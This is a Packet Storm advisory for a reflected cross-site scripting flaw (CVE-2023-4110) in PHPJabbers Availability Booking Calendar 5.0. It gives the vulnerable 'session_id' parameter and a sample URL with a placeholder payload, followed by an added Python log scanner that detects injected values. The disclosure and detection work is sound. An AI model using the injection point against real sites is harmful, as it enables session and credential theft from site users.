PACKETSTORM:173926, by CraCkEr (packetstorm)
Aug 03, 2023 - 12:00 a.m.

PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting

packetstormsecurity.com

EPSS: 0.006 (percentile 78.5%)

`# Exploit Title: PHPJabbers Availability Booking Calendar 5.0 - Reflected XSS  
# Exploit Author: CraCkEr  
# Date: 20/07/2023  
# Vendor: PHPJabbers  
# Vendor Homepage: https://www.phpjabbers.com/  
# Software Link: https://www.phpjabbers.com/availability-booking-calendar/  
# Tested on: Windows 10 Pro  
# Impact: Manipulate the content of the site  
# CVE: CVE-2023-4110  
  
  
## Greetings  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka   
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
  
## Description  
  
The attacker can send the victim a link containing a malicious URL in an email or instant message,  
and can perform a wide variety of actions, such as stealing the victim's session token or login credentials  
  
  
  
Path: /index.php  
  
GET parameter 'session_id' is vulnerable to RXSS  
  
https://website/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=[XSS]&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0  
  
  
  
[-] Done  
`
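
A log check a defender could run for this issue, as an added example (not part of the advisory or the vendor's code): it flags requests to the booking-form endpoint named above whose `session_id` falls outside an allowlisted alphabet. The alphabet (PHP-style session ID characters), the combined access-log format and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: session_id carries a PHP-style session identifier, whose
# alphabet is limited to letters, digits, "," and "-".
SAFE_SESSION_ID = re.compile(r"[A-Za-z0-9,-]{0,256}")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_session_id(log_line):
    """Return the decoded session_id when the line hits the booking-form
    endpoint with a value outside the allowlist, otherwise None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/index.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if (params.get("controller") != ["pjFront"]
            or params.get("action") != ["pjActionGetBookingForm"]):
        return None
    for value in params.get("session_id", []):
        if not SAFE_SESSION_ID.fullmatch(value):
            return value  # decoded once; leftover "%" marks double encoding
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := suspicious_session_id(line)) is not None]

# Constructed sample log lines (not taken from the advisory).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Aug/2023:10:00:01 +0000] "GET /index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=9f2c4a7be01d&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [03/Aug/2023:10:00:09 +0000] "GET /index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cx%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0 HTTP/1.1" 200 5177',
    '198.51.100.4 - - [03/Aug/2023:10:01:30 +0000] "GET /contact.php?session_id=%3Cx%3E HTTP/1.1" 200 300',
    '198.51.100.8 - - [03/Aug/2023:10:02:02 +0000] "GET /index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%253Cx%253E&cid=1 HTTP/1.1" 200 5177',
]

if __name__ == "__main__":
    for line_no, value in scan(SAMPLE_LOG):
        print(f"line {line_no}: unexpected session_id {value!r}")
```

The same allowlist can be enforced server-side before the value is echoed back, alongside HTML-encoding on output.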
